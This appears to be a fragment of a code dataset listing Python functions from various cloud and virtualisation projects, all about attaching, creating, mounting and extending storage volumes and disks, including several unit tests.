attach\n lun = 0 if len(data_disks) == 0 else len(data_disks) + 1\n\n update_data = {\n 'lun': lun,\n 'name': disk.name,\n 'create_option': models.DiskCreateOption.attach,\n 'managed_disk': {'id': disk.resource_id}\n }\n\n data_disks.append(update_data)\n\n try:\n request = self.compute_client.virtual_machines.begin_update(\n self.resource_group_name, self.name, vm)\n while not request.done():\n sleep(5) # Wait 5 seconds before checking vm status again\n except azure_exceptions.CloudError as exception:\n raise RuntimeError(\n 'Could not attach disk {0:s} to instance {1:s}: {2:s}'.format(\n disk.name, self.name, str(exception))) from exception", "def attach_volume(self, server, volume, device=None, tag=None):\n attach_kwargs = dict(volumeId=volume['id'])\n if device:\n attach_kwargs['device'] = device\n if tag:\n attach_kwargs['tag'] = tag\n\n attachment = self.servers_client.attach_volume(\n server['id'], **attach_kwargs)['volumeAttachment']\n # On teardown detach the volume and for multiattach volumes wait for\n # the attachment to be removed. For non-multiattach volumes wait for\n # the state of the volume to change to available. 
This is so we don't\n # error out when trying to delete the volume during teardown.\n if volume['multiattach']:\n att = waiters.wait_for_volume_attachment_create(\n self.volumes_client, volume['id'], server['id'])\n self.addCleanup(waiters.wait_for_volume_attachment_remove,\n self.volumes_client, volume['id'],\n att['attachment_id'])\n else:\n self.addCleanup(waiters.wait_for_volume_resource_status,\n self.volumes_client, volume['id'], 'available')\n waiters.wait_for_volume_resource_status(self.volumes_client,\n volume['id'], 'in-use')\n # Ignore 404s on detach in case the server is deleted or the volume\n # is already detached.\n self.addCleanup(self._detach_volume, server, volume)\n return attachment", "def add_vm_with_disk(request, storage):\n self = request.node.cls\n\n def finalizer():\n assert ll_vms.safely_remove_vms(\n [self.test_vm_name]\n ), \"Unable to remove VM %s\" % self.test_vm_name\n\n request.addfinalizer(finalizer)\n self.vm_names = list()\n self.test_vm_name = storage_helpers.create_unique_object_name(\n self.__name__, config.OBJECT_TYPE_VM\n )\n vm_args = config.create_vm_args.copy()\n vm_args['vmName'] = self.test_vm_name\n vm_args['storageDomainName'] = self.storage_domain\n\n testflow.setup(\"Creating VM %s\", self.test_vm_name)\n assert storage_helpers.create_vm_or_clone(**vm_args), (\n \"Failed to create VM %s\" % self.test_vm_name\n )\n self.vm_names.append(self.test_vm_name)\n\n testflow.setup(\n \"Attaching disk %s to VM %s\", self.disk_name, self.test_vm_name\n )\n assert ll_disks.attachDisk(True, self.disk_name, self.test_vm_name), (\n \"Failed to attach disk %s to VM %s\" %\n (self.disk_name, self.test_vm_name)\n )\n assert ll_disks.wait_for_disks_status(self.disk_name), (\n \"Disk %s is not in the expected state 'OK\" % self.disk_name\n )", "def _do_attach(self, attach_device):\n try:\n if attach_device is not None:\n log.debug(\"Attaching volume '%s' to instance '%s' as device '%s'\" %\n (self.volume_id, self.app.cloud_interface.get_instance_id(),\n attach_device))\n self.volume.attach(\n self.app.cloud_interface.get_instance_id(), attach_device)\n else:\n log.error(\"Attaching volume '%s' to instance '%s' failed because \"\n \"could not determine device.\"\n % (self.volume_id, self.app.cloud_interface.get_instance_id()))\n return False\n except EC2ResponseError, e:\n if e.error_code == 'InvalidVolume.ZoneMismatch':\n msg = (\"Volume '{0}' is located in the wrong availability zone \"\n \"for this instance. You MUST terminate this instance \"\n \"and start a new one in zone '{1}' instead of '{2}' \"\n \"to be able to use this volume.\"\n .format(self.volume_id, self.volume.zone,\n self.app.cloud_interface.get_zone()))\n self.app.msgs.critical(msg)\n log.error(msg)\n self.fs.state = service_states.ERROR\n else:\n log.error(\"Attaching volume '%s' to instance '%s' as device '%s' failed. 
\"\n \"Exception: %s (%s)\" % (self.volume_id,\n self.app.cloud_interface.get_instance_id(),\n attach_device, e.message,\n e.error_code))\n return False\n return self.status", "def _attach_volume(self):\n return []", "def __mount_ebs_volume( self ):\n ebs_volume_size = self.instance_tag( 'ebs_volume_size' ) or '0'\n ebs_volume_size = int( ebs_volume_size )\n if ebs_volume_size:\n instance_name = self.instance_tag( 'Name' )\n cluster_ordinal = int( self.instance_tag( 'cluster_ordinal' ) )\n volume_name = '%s__%d' % (instance_name, cluster_ordinal)\n volume = EC2VolumeHelper( ec2=self.ec2,\n availability_zone=self.availability_zone,\n name=volume_name,\n size=ebs_volume_size,\n volume_type=\"gp2\" )\n # TODO: handle case where volume is already attached\n device_ext = '/dev/sdf'\n device = '/dev/xvdf'\n volume.attach( self.instance_id, device_ext )\n\n # Wait for inode to appear and make sure its a block device\n while True:\n try:\n assert stat.S_ISBLK( os.stat( device ).st_mode )\n break\n except OSError as e:\n if e.errno == errno.ENOENT:\n time.sleep( 1 )\n else:\n raise\n\n # Only format empty volumes\n volume_label = volume_label_hash( volume_name )\n if check_output( [ 'file', '-sL', device ] ).strip( ) == device + ': data':\n check_call( [ 'mkfs', '-t', 'ext4', device ] )\n check_call( [ 'e2label', device, volume_label ] )\n else:\n # If the volume is not empty, verify the file system label\n actual_label = check_output( [ 'e2label', device ] ).strip( )\n if actual_label != volume_label:\n raise AssertionError(\n \"Expected volume label '%s' (derived from '%s') but got '%s'\" %\n (volume_label, volume_name, actual_label) )\n current_mount_point = self.__mount_point( device )\n if current_mount_point is None:\n mkdir_p( self.persistent_dir )\n check_call( [ 'mount', device, self.persistent_dir ] )\n elif current_mount_point == self.persistent_dir:\n pass\n else:\n raise RuntimeError(\n \"Can't mount device %s on '%s' since it is already mounted on '%s'\" % (\n device, self.persistent_dir, current_mount_point) )\n else:\n # No persistent volume is attached and the root volume is off limits, so we will need\n # to place persistent data on the ephemeral volume.\n self.persistent_dir = self.ephemeral_dir", "def create(self, filesystem=None):\n if not self.size and not self.from_snapshot_id and not self.from_archive:\n log.error('Cannot add a {0} volume without a size, snapshot ID or '\n 'archive url; aborting.'.format(self.fs))\n return False\n # If creating the volume from a snaphost, get the expected volume size\n if self.from_snapshot_id and not self.volume:\n self.snapshot = self.app.cloud_interface.get_snapshot(self.from_snapshot_id)\n if not self.snapshot:\n log.error(\"Did not retrieve Snapshot object for {0}; aborting.\"\n .format(self.from_snapshot_id))\n return False\n # We need a size to be able to create a volume, so if none\n # is specified, use snapshot size\n if not self.size:\n si = self.app.cloud_interface.get_snapshot_info(self.from_snapshot_id)\n self.size = si.get('volume_size')\n # If it does not already exist, create the volume\n if self.status == volume_status.NONE:\n log.debug(\"Creating a new volume of size '%s' in zone '%s' from \"\n \"snapshot '%s' for %s.\"\n % (self.size, self.app.cloud_interface.get_zone(),\n self.from_snapshot_id, self.fs))\n self.volume = self.app.cloud_interface.create_volume(\n self.size,\n self.app.cloud_interface.get_zone(),\n snapshot=self.from_snapshot_id)\n if self.volume:\n # When creating from a snapshot in Euca, volume.size may be 
None\n self.size = int(self.volume.size or 0)\n log.debug(\"Created a new volume of size '%s' from snapshot '%s' \"\n \"with ID '%s' in zone '%s' for %s.\"\n % (self.size, self.from_snapshot_id, self.volume_id,\n self.app.cloud_interface.get_zone(), self.fs))\n else:\n log.warning(\"No volume object - did not create a volume?\")\n return False\n else:\n log.debug(\"Tried to create a volume for %s but it is in state '%s' \"\n \"(volume ID: %s)\" % (self.fs, self.status, self.volume_id))\n return False\n # Add tags to newly created volumes (do this outside the inital if/else\n # to ensure the tags get assigned even if using an existing volume vs.\n # creating a new one)\n self.app.cloud_interface.add_tag(\n self.volume, 'Name', self.app.config['cluster_name'])\n self.app.cloud_interface.add_tag(\n self.volume, 'bucketName', self.app.config['bucket_cluster'])\n if self.fs:\n self.app.cloud_interface.add_tag(\n self.volume, 'filesystem', self.fs.get_full_name())\n self.app.cloud_interface.add_tag(\n self.volume, 'roles', ServiceRole.to_string(self.fs.svc_roles))\n return True", "def attach_volumes(instance_id, volumes):\n if type(volumes) is not list:\n volumes = [volumes]\n for volume in volumes:\n command = 'nova volume-attach %s %s %s' % (instance_id, volume['id'],\n volume['device'])\n dest_attachment = parse_output(Popen(command.split(), stdout=STDOUT,\n stderr=STDERR).communicate()[0])", "def assign_volume(VolumeId=None, InstanceId=None):\n pass", "def add(self):\n self.create(self.fs.name)\n # Mark a volume as 'static' if created from a snapshot\n # Note that if a volume is marked as 'static', it is assumed it\n # can be deleted upon cluster termination!\n if (ServiceRole.GALAXY_DATA not in self.fs.svc_roles and\n (self.from_snapshot_id is not None or self.from_archive is not\n None)):\n log.debug(\"Marked volume '%s' from file system '%s' as 'static'\" %\n (self.volume_id, self.fs.name))\n # FIXME: This is a major problem - any new volumes added from a snapshot\n # will be assumed 'static'. This is OK before being able to add an\n # arbitrary volume as a file system but is no good any more. 
The\n # problem is in automatically detecting volumes that are supposed\n # to be static and are being added automatically at startup\n if self.from_archive:\n self.fs.kind = 'volume' # Treated as a regular volume after initial extraction\n else:\n self.static = True\n self.fs.kind = 'snapshot'\n else:\n self.fs.kind = 'volume'\n if self.attach():\n us = os.path.join(self.app.path_resolver.galaxy_data, 'upload_store')\n misc.remove(us)\n log.debug(\"Volume attached, mounting {0}\".format(self.fs.mount_point))\n self.mount(self.fs.mount_point)", "def mount(fstype, export, vol_name, mountpoint, instance, options=None):\n with __manager__.get_state() as mount_state:\n mount_state.mount(fstype, export, vol_name, mountpoint, instance,\n options)", "def attach(self,\n names,\n vm):\n results = []\n for name in names:\n volume_info = self.cm.find_name(name)\n if volume_info and volume_info[0]['State'] != \"deleted\":\n vms = volume_info[0]['AttachedToVm']\n path = volume_info[0]['path']\n if vm in vms:\n Console.error(f\"{name} already attached to {vm}\")\n else:\n result = self.mount(path=f\"{path}/{name}\", vm=vm)\n mounts = result['mounts']\n if f\"{path}/{name}\" in mounts.keys():\n vms.append(vm)\n\n result = self.update_volume_after_attached_to_vm(\n info=volume_info, vms=vms)\n results.append(result)\n else:\n Console.error(\n \"volume is not existed or volume had been deleted\")\n return results[0]", "def migrate(self, **kwargs):\n volume_name = kwargs['NAME']\n vm = kwargs['vm']\n volume_info = self.cm.find_name(name=volume_name)\n volume_attached_vm = volume_info[0]['AttachedToVm']\n vm_info = Shell.run(f\"multipass info {vm} --format=json\")\n vm_info = json.loads(vm_info)\n vm_status = vm_info[\"info\"][vm]['state']\n if vm_status == 'running':\n param = {'NAME': volume_name}\n self.detach(**param)\n self.attach(**param, vm=vm)\n try:\n for old_vm in volume_attached_vm:\n volume_info[0]['AttachedToVm'].remove(old_vm)\n except:\n pass\n volume_info[0]['AttachedToVm'].append(vm)\n return volume_info", "def _attach_volume_to_sg(self, context, volume_id, sg_client):\n @utils.synchronized(sg_client.instance)\n def _do_attach_volume(context, volume_id, sg_client):\n try:\n old_devices = self.driver.list_devices(sg_client)\n LOG.info(_LI(\"old devices: %s\"), old_devices)\n nova_client = self._create_nova_client(self.admin_context)\n nova_client.volumes.create_server_volume(sg_client.instance,\n volume_id)\n cinder_client = self._create_cinder_client(context)\n cinder_volume = self._wait_cinder_volume_status(\n cinder_client, volume_id, 'in-use')\n if cinder_volume.status != 'in-use':\n raise Exception(_LE(\"attach volume to sg failed\"))\n new_devices = self.driver.list_devices(sg_client)\n LOG.info(_LI(\"new devices: %s\"), new_devices)\n added_devices = [device for device in new_devices\n if device not in old_devices]\n return added_devices[0]\n except Exception as err:\n LOG.error(err)\n raise exception.AttachSGFailed(reason=err)\n\n return _do_attach_volume(context, volume_id, sg_client)", "def mount_root_vm(self):\n print \"montage de la partition root de %s\" % name_vm_dest\n self.exec_cmd(\"mount /dev/%s/root-%s %s\" % (vgname, name_vm_dest, self.rep_vhosts_vm))", "def create_volume(self, instance_id):\n user, instance = _get_user_and_instance(self.girder_client, instance_id)\n tale = self.girder_client.get('/tale/{taleId}'.format(**instance))\n\n self.job_manager.updateProgress(\n message='Creating volume', total=CREATE_VOLUME_STEP_TOTAL,\n current=1, forceFlush=True)\n\n vol_name = 
\"%s_%s_%s\" % (tale['_id'], user['login'], new_user(6))\n fs_sidecar = FSContainer.start_container(vol_name)\n payload = {\n \"mounts\": [\n {\n \"type\": \"data\",\n \"protocol\": \"girderfs\",\n \"location\": \"data\",\n },\n {\n \"type\": \"home\",\n \"protocol\": \"bind\",\n \"location\": \"home\",\n },\n {\n \"type\": \"workspace\",\n \"protocol\": \"bind\",\n \"location\": \"workspace\",\n },\n {\n \"type\": \"versions\",\n \"protocol\": \"girderfs\",\n \"location\": \"versions\",\n },\n {\n \"type\": \"runs\",\n \"protocol\": \"girderfs\",\n \"location\": \"runs\",\n },\n ],\n \"taleId\": tale[\"_id\"],\n \"userId\": user[\"_id\"],\n \"girderApiUrl\": GIRDER_API_URL,\n \"girderApiKey\": _get_api_key(self.girder_client),\n \"root\": vol_name,\n }\n FSContainer.mount(fs_sidecar, payload)\n self.job_manager.updateProgress(\n message='Volume created', total=CREATE_VOLUME_STEP_TOTAL,\n current=CREATE_VOLUME_STEP_TOTAL, forceFlush=True)\n print(\"WT Filesystem created successfully.\")\n\n cli = docker.from_env()\n return dict(\n nodeId=cli.info()['Swarm']['NodeID'],\n fscontainerId=fs_sidecar.id,\n volumeName=vol_name,\n instanceId=instance_id,\n taleId=tale[\"_id\"],\n )", "def attachDisk(\n positive, alias, vm_name, active=True, read_only=False, disk_id=None,\n interface='virtio', bootable=None,\n):\n if disk_id:\n name = disk_id\n attribute = 'id'\n else:\n name = alias\n attribute = 'name'\n disk_object = get_disk_obj(name, attribute)\n # This is only needed because for legacy reason we also want to modify\n # the read_only property when we attach a disk\n # Also for attaching a disk the active parameter is pass inside the disk\n # object\n updated_disk = _prepareDiskObject(\n id=disk_object.get_id(), read_only=read_only\n )\n vm_disks = getObjDisks(vm_name)\n logger.info(\"Attaching disk %s to vm %s\", alias, vm_name)\n disk_attachment = prepare_disk_attachment_object(\n updated_disk.get_id(), interface=interface, bootable=bootable,\n disk=updated_disk, active=active\n )\n return DISK_ATTACHMENTS_API.create(\n disk_attachment, positive, collection=vm_disks\n )[1]", "def extend_volume(self, volume, new_size):\n LOG.info('Extending volume: %(id)s New size: %(size)s GB',\n {'id': volume['id'], 'size': new_size})\n nfs_share = volume['provider_location']\n nms = self.share2nms[nfs_share]\n volume_path = self.remote_path(volume)\n if getattr(self.configuration,\n self.driver_prefix + '_sparsed_volumes'):\n self._create_sparsed_file(nms, volume_path, new_size)\n else:\n block_size_mb = 1\n block_count = ((new_size - volume['size']) * units.Gi /\n (block_size_mb * units.Mi))\n\n nms.appliance.execute(\n 'dd if=/dev/zero seek=%(seek)d of=%(path)s'\n ' bs=%(bs)dM count=%(count)d' % {\n 'seek': volume['size'] * units.Gi / block_size_mb,\n 'path': volume_path,\n 'bs': block_size_mb,\n 'count': block_count\n }\n )", "def attach(self, storages):\n self.tracer.info(\"%s.attach method called\" % self.__class__.__name__)\n\n # reload global.ini\n self._cfg.reload()\n\n # connect to Google API\n conn = self.api_conn()\n\n # fetch the GCE zone for this host\n zone = self.get_zone(conn, HOSTNAME)\n\n for storage in storages:\n # fetch pd & dev variables from global.ini for specified partition & usage\n connectionData = self._getConnectionDataForLun(storage.get(\"partition\"), storage.get(\"usage_type\"))\n try:\n pd = connectionData[\"pd\"]\n dev = connectionData[\"dev\"]\n except:\n raise Exception(\"pd or dev not set in global.ini\")\n\n # fetch mount options from global.ini\n try:\n mount_options = 
connectionData[\"mountoptions\"]\n except:\n mount_options = \"\"\n\n # fetch fencing options from global.ini\n try:\n fencing = connectionData[\"fencing\"]\n except:\n fencing = \"\"\n\n # fetch the host which currently owns the disk & the file path\n pdhost = self.get_pd_host(conn, pd, zone)\n path = storage.get(\"path\")\n\n # check if the require disk is already attached somewhere. If it is, detach it and fence the old host\n if pdhost == HOSTNAME:\n self.tracer.info(\"disk %s is already attached to %s(%s)\" % (pd, HOSTNAME, zone))\n self.mount(dev, path, mount_options)\n continue\n elif pdhost != \"\":\n self.tracer.info(\"unable to attach %s to %s(%s) as it is still attached to %s\" % (pd, HOSTNAME, zone, pdhost))\n self.detach_pd(conn, pdhost, pd)\n if fencing.lower() == \"enabled\" or fencing.lower() == \"true\" or fencing.lower() == \"yes\":\n self.fence(conn, pdhost)\n\n # prepare payload for API call\n pdurl = self.zonal_url(zone, \"disks\", pd)\n body = {\n \"deviceName\": pd,\n \"source\": pdurl\n }\n\n # send API call to disconnect disks\n self.tracer.info(\"attempting to attach %s to %s(%s)\" % (pd, HOSTNAME, zone))\n operation = conn.instances().attachDisk(project=PROJECT, zone=zone, instance=HOSTNAME, body=body).execute()\n self.wait_for_operation(conn, operation, zone)\n\n # check if disk is attached and if so, mount the volumes\n if self.get_pd_host(conn, pd, zone) == HOSTNAME:\n self.tracer.info(\"successfully attached %s to %s(%s)\" % (pd, HOSTNAME, zone))\n self.mount(dev, path, mount_options)\n else:\n raise Exception(\"failed to attached %s to %s(%s)\" % (pd, HOSTNAME, zone))\n\n # tell HANA is all good and to continue the load process\n return 0", "def update_volume_after_attached_to_vm(self, info, vms):\n path = info[0]['path']\n path_list = path.split(sep='/')\n machine_path_list = [\"~\", \"Home\"]\n machine_path_list.extend(path_list[3:])\n info[0]['machine_path'] = \"/\".join(machine_path_list)\n info[0]['AttachedToVm'] = vms\n info[0]['State'] = 'in-use'\n info[0]['time'] = datetime.datetime.now()\n return info", "def test_06_migrate_vm_live_attach_disk(self):\n \n global vm\n global data_disk_1\n data_disk_1 = self.helper.create_custom_disk(\n self.apiclient,\n {\"diskname\":\"StorPoolDisk\" },\n zoneid=self.zone.id,\n size = 5,\n miniops = 2000,\n maxiops = 5000,\n account=self.account.name,\n domainid=self.account.domainid,\n diskofferingid=self.disk_offerings.id,\n )\n\n self.debug(\"Created volume with ID: %s\" % data_disk_1.id)\n\n self.virtual_machine_live_migration_1.attach_volume(\n self.apiclient,\n data_disk_1\n )\n\n destinationHost, vol_list = self.helper.get_destination_pools_hosts(self.apiclient, vm, self.host)\n for v in vol_list:\n self.helper.check_storpool_volume_iops(self.spapi, v)\n vm = self.helper.migrateVm(self.apiclient, self.virtual_machine_live_migration_1, destinationHost)\n\n\n self.virtual_machine_live_migration_1.attach_volume(\n self.apiclient,\n self.volume\n )\n\n destinationHost, vol_list = self.helper.get_destination_pools_hosts(self.apiclient,vm, self.host)\n for v in vol_list:\n self.helper.check_storpool_volume_iops(self.spapi, v)\n vm = self.helper.migrateVm(self.apiclient, self.virtual_machine_live_migration_1, destinationHost)\n\n destinationHost, vol_list = self.helper.get_destination_pools_hosts(self.apiclient,vm, self.host)\n for v in vol_list:\n self.helper.check_storpool_volume_iops(self.spapi, v)", "def test_volume_extend(self, volume, volumes_steps):\n volumes_steps.extend_volume(volume.name)", "def 
attach_device(self):\n if self.volume:\n self.volume.update()\n return self.volume.attach_data.device\n else:\n return None", "def add_volume(self, size=100):\n tfvars_file = \"terraform.tfvars.json\"\n with open(os.path.join(self.cluster_path, tfvars_file)) as f:\n tfvars = json.load(f)\n\n cluster_id = tfvars['cluster_id']\n worker_pattern = f'{cluster_id}-worker*'\n logger.info(f'Worker pattern: {worker_pattern}')\n self.create_ebs_volumes(worker_pattern, size)", "def test_attach_attached_volume_to_same_server(self):\n server, validation_resources = self._create_server()\n volume = self.create_volume()\n\n self.attach_volume(server, volume)\n\n self.assertRaises(lib_exc.BadRequest,\n self.attach_volume, server, volume)", "def add_volume(self, volume: 'Volume'):\n self.volumes.append(volume)", "def _AttachDisk(self, idx, params, _):\n uuid = params.get(\"uuid\", None)\n name = params.get(constants.IDISK_NAME, None)\n\n disk = self.GenericGetDiskInfo(uuid, name)\n\n # Rename disk before attaching (if disk is filebased)\n if disk.dev_type in constants.DTS_INSTANCE_DEPENDENT_PATH:\n # Add disk size/mode, else GenerateDiskTemplate will not work.\n params[constants.IDISK_SIZE] = disk.size\n params[constants.IDISK_MODE] = str(disk.mode)\n dummy_disk = self._GenerateDiskTemplateWrapper(idx, disk.dev_type, params)\n new_logical_id = dummy_disk.logical_id\n result = self.rpc.call_blockdev_rename(self.instance.primary_node,\n [(disk, new_logical_id)])\n result.Raise(\"Failed before attach\")\n self.cfg.SetDiskLogicalID(disk.uuid, new_logical_id)\n disk.logical_id = new_logical_id\n\n # Attach disk to instance\n self.cfg.AttachInstanceDisk(self.instance.uuid, disk.uuid, idx)\n\n # re-read the instance from the configuration\n self.instance = self.cfg.GetInstanceInfo(self.instance.uuid)\n\n changes = [\n (\"disk/%d\" % idx,\n \"attach:size=%s,mode=%s\" % (disk.size, disk.mode)),\n ]\n\n disks_ok, _, payloads = AssembleInstanceDisks(self, self.instance,\n disks=[disk])\n if not disks_ok:\n changes.append((\"disk/%d\" % idx, \"assemble:failed\"))\n return disk, changes\n\n if self.op.hotplug:\n _, link_name, uri = payloads[0]\n msg = self._HotplugDevice(constants.HOTPLUG_ACTION_ADD,\n constants.HOTPLUG_TARGET_DISK,\n disk, (link_name, uri), idx)\n changes.append((\"disk/%d\" % idx, msg))\n\n return (disk, changes)", "def fusion_api_create_storage_volume(self, body, api=None, headers=None):\n return self.volume.create(body=body, api=api, headers=headers)", "def add_volume(self, oid, volume_id):\n data = {\n \"volumeAttachment\": {\n \"volumeId\": volume_id,\n }\n }\n path = '/servers/%s/os-volume_attachments' % oid\n res = self.client.call(path, 'POST', data=json.dumps(data), \n token=self.manager.identity.token)\n self.logger.debug('Add volume %s to server %s: %s' % \n (volume_id, oid, truncate(res)))\n return res[0]['volumeAttachment']", "def test_attach_attached_volume_to_different_server(self):\n server1, validation_resources = self._create_server()\n volume = self.create_volume()\n\n self.attach_volume(server1, volume)\n\n # Create server2 and attach in-use volume\n server2, validation_resources = self._create_server()\n self.assertRaises(lib_exc.BadRequest,\n self.attach_volume, server2, volume)", "def _mount_gluster_vol(self, mount_path, ensure=False):\n self._execute('mkdir', '-p', mount_path)\n command = ['mount', '-t', 'glusterfs', self.gluster_manager.export,\n mount_path]\n self._do_mount(command, ensure)", "def vm_volume(self, vm_volume):\n\n self._vm_volume = vm_volume", "def 
attach_disk_to_vm(self, vm_ref, instance_name,\n adapter_type, disk_type, vmdk_path=None,\n disk_size=None, linked_clone=False,\n controller_key=None, unit_number=None,\n device_name=None):\n client_factory = self._session._get_vim().client.factory\n vmdk_attach_config_spec = vm_util.get_vmdk_attach_config_spec(\n client_factory, adapter_type, disk_type,\n vmdk_path, disk_size, linked_clone,\n controller_key, unit_number, device_name)\n\n LOG.debug(_(\"Reconfiguring VM instance %(instance_name)s to attach \"\n \"disk %(vmdk_path)s or device %(device_name)s with type \"\n \"%(disk_type)s\") % locals())\n reconfig_task = self._session._call_method(\n self._session._get_vim(),\n \"ReconfigVM_Task\", vm_ref,\n spec=vmdk_attach_config_spec)\n self._session._wait_for_task(instance_name, reconfig_task)\n LOG.debug(_(\"Reconfigured VM instance %(instance_name)s to attach \"\n \"disk %(vmdk_path)s or device %(device_name)s with type \"\n \"%(disk_type)s\") % locals())", "def _create_volume(self):\n vol = {}\n vol['size'] = 1\n vol['availability_zone'] = 'test'\n return db.volume_create(self.context, vol)['id']", "def create_disk(self, disk):\n spec = {\n 'new_vmdk': {\n # Convert from mebibytes to bytes because VMDK is specified in bytes\n 'capacity': 1024\n * 1024\n * disk.size,\n }\n }\n\n try:\n backend_id = self.client.create_disk(disk.vm.backend_id, spec)\n except VMwareError as e:\n raise VMwareBackendError(e)\n else:\n disk.backend_id = backend_id\n disk.save(update_fields=['backend_id'])\n signals.vm_updated.send(self.__class__, vm=disk.vm)\n return disk", "def create_volume(self, volume):\n LOG.debug('SPDK create volume')\n\n return self._create_volume(volume)", "def createDisk(instanceID, devicePrefix, raidDevice, numVolumes, volumeSize,\n mountPath, namePrefix):\n assert numVolumes > 0\n assert 0 < volumeSize < 1000\n if numVolumes > 1:\n assert raidDevice is not None\n\n print 'Getting instance information.'\n ec2 = EC2Connection()\n instance = ec2.get_all_instances([instanceID])[0].instances[0]\n zone = instance.placement\n\n volumes = []\n for i in range(numVolumes):\n device = devicePrefix + str(i + 1)\n print 'Creating volume for', device\n volume = ec2.create_volume(volumeSize, zone)\n volume.attach(instanceID, device)\n volumes.append(volume)\n if namePrefix is not None:\n volume.add_tag(\n 'Name', '{0} ({1})'.format(namePrefix, device.split('/')[-1]))\n\n pendingVolumes = set(volumes)\n while pendingVolumes:\n print 'Attaching volumes.', len(pendingVolumes), 'remaining.'\n time.sleep(1)\n for volume in list(pendingVolumes):\n try:\n volume.update()\n except EC2ResponseError:\n print 'Response error.'\n print \"Don't panic, this usually happens, trying again.\"\n if volume.attachment_state() == u'attached':\n pendingVolumes.remove(volume)\n\n print 'All volumes attached: ', ''.join(volume.id for volume in volumes)\n\n env.host_string = instance.dns_name\n\n if len(volumes) > 1:\n sudo('DEBIAN_FRONTEND=noninteractive apt-get install -y mdadm')\n print 'Creating RAID array.'\n devices = [volume.attach_data.device.replace('/dev/sd', '/dev/xvd')\n for volume in volumes]\n devices = ' '.join(devices)\n sudo('mdadm --create {0} --level raid10 --auto=yes --assume-clean '\n '--raid-devices {1} {2}'.format(raidDevice, numVolumes, devices))\n sudo('echo DEVICE {0} >> /etc/mdadm/mdadm.conf'.format(devices))\n sudo('mdadm --detail --scan | grep {0} | '\n 'sudo tee -a /etc/mdadm/mdadm.conf'.format(raidDevice))\n\n # Tell the kernel to use the specified configurationg, otherwise it\n # will use 
something like /dev/md127\n sudo('update-initramfs -u')\n\n device = raidDevice\n else:\n device = volumes[0].attach_data.device.replace('/dev/sd', '/dev/xvd')\n\n print 'Formating device.'\n sudo('mkfs.ext4 {0}'.format(device))\n sudo('echo \"{0} {1} ext4 noatime 0 0\" >> /etc/fstab'.format(device,\n mountPath))\n\n print 'Mounting device.'\n sudo('mkdir -p {0}'.format(mountPath))\n sudo('mount %s' % mountPath)\n print 'Success.'", "def create_volume(self, volume):\n # Generate App Instance, Storage Instance and Volume\n # Volume ID will be used as the App Instance Name\n # Storage Instance and Volumes will have standard names\n policies = self._get_policies_for_resource(volume)\n num_replicas = int(policies['replica_count'])\n storage_name = policies['default_storage_name']\n volume_name = policies['default_volume_name']\n\n app_params = (\n {\n 'create_mode': \"openstack\",\n 'uuid': str(volume['id']),\n 'name': _get_name(volume['id']),\n 'access_control_mode': 'deny_all',\n 'storage_instances': {\n storage_name: {\n 'name': storage_name,\n 'volumes': {\n volume_name: {\n 'name': volume_name,\n 'size': volume['size'],\n 'replica_count': num_replicas,\n 'snapshot_policies': {\n }\n }\n }\n }\n }\n })\n self._create_resource(volume, URL_TEMPLATES['ai'](), body=app_params)", "def test_finish_resize_with_volumes(self):\n\n # create instance\n instance = self._create_fake_instance_obj()\n request_spec = objects.RequestSpec()\n\n # create volume\n volume = {'instance_uuid': None,\n 'device_name': None,\n 'id': uuids.volume,\n 'size': 200,\n 'attach_status': 'detached'}\n bdm = objects.BlockDeviceMapping(\n **{'context': self.context,\n 'source_type': 'volume',\n 'destination_type': 'volume',\n 'volume_id': uuids.volume,\n 'instance_uuid': instance['uuid'],\n 'device_name': '/dev/vdc'})\n bdm.create()\n\n # stub out volume attach\n def fake_volume_get(self, context, volume_id, microversion=None):\n return volume\n self.stub_out('nova.volume.cinder.API.get', fake_volume_get)\n\n def fake_volume_check_availability_zone(self, context,\n volume_id, instance):\n pass\n self.stub_out('nova.volume.cinder.API.check_availability_zone',\n fake_volume_check_availability_zone)\n\n def fake_get_volume_encryption_metadata(self, context, volume_id):\n return {}\n self.stub_out('nova.volume.cinder.API.get_volume_encryption_metadata',\n fake_get_volume_encryption_metadata)\n\n orig_connection_data = {\n 'target_discovered': True,\n 'target_iqn': 'iqn.2010-10.org.openstack:%s.1' % uuids.volume_id,\n 'target_portal': '127.0.0.0.1:3260',\n 'volume_id': uuids.volume_id,\n }\n connection_info = {\n 'driver_volume_type': 'iscsi',\n 'data': orig_connection_data,\n }\n\n def fake_init_conn(self, context, volume_id, session):\n return connection_info\n self.stub_out('nova.volume.cinder.API.initialize_connection',\n fake_init_conn)\n\n def fake_attach(self, context, volume_id, instance_uuid, device_name,\n mode='rw'):\n volume['instance_uuid'] = instance_uuid\n volume['device_name'] = device_name\n self.stub_out('nova.volume.cinder.API.attach', fake_attach)\n\n # stub out virt driver attach\n def fake_get_volume_connector(*args, **kwargs):\n return {}\n self.stub_out('nova.virt.fake.FakeDriver.get_volume_connector',\n fake_get_volume_connector)\n\n def fake_attach_volume(*args, **kwargs):\n pass\n self.stub_out('nova.virt.fake.FakeDriver.attach_volume',\n fake_attach_volume)\n\n # attach volume to instance\n self.compute.attach_volume(self.context, instance, bdm)\n\n # assert volume attached correctly\n 
self.assertEqual(volume['device_name'], '/dev/vdc')\n disk_info = db.block_device_mapping_get_all_by_instance(\n self.context, instance.uuid)\n self.assertEqual(len(disk_info), 1)\n for bdm in disk_info:\n self.assertEqual(bdm['device_name'], volume['device_name'])\n self.assertEqual(bdm['connection_info'],\n jsonutils.dumps(connection_info))\n\n # begin resize\n flavor = self.default_flavor\n instance.task_state = task_states.RESIZE_PREP\n instance.save()\n self.compute.prep_resize(self.context, instance=instance,\n flavor=flavor,\n image={}, request_spec=request_spec,\n filter_properties={}, node=None,\n clean_shutdown=True, migration=None,\n host_list=[])\n\n # fake out detach for prep_resize (and later terminate)\n def fake_terminate_connection(self, context, volume, connector):\n connection_info['data'] = None\n self.stub_out('nova.volume.cinder.API.terminate_connection',\n fake_terminate_connection)\n\n migration = objects.Migration.get_by_instance_and_status(\n self.context.elevated(),\n instance.uuid, 'pre-migrating')\n self.compute.resize_instance(self.context, instance=instance,\n migration=migration, image={},\n # TODO(stephenfin): Why a JSON string?\n flavor=jsonutils.to_primitive(flavor),\n clean_shutdown=True, request_spec=request_spec)\n\n # assert bdm is unchanged\n disk_info = db.block_device_mapping_get_all_by_instance(\n self.context, instance.uuid)\n self.assertEqual(len(disk_info), 1)\n for bdm in disk_info:\n self.assertEqual(bdm['device_name'], volume['device_name'])\n cached_connection_info = jsonutils.loads(bdm['connection_info'])\n self.assertEqual(cached_connection_info['data'],\n orig_connection_data)\n # but connection was terminated\n 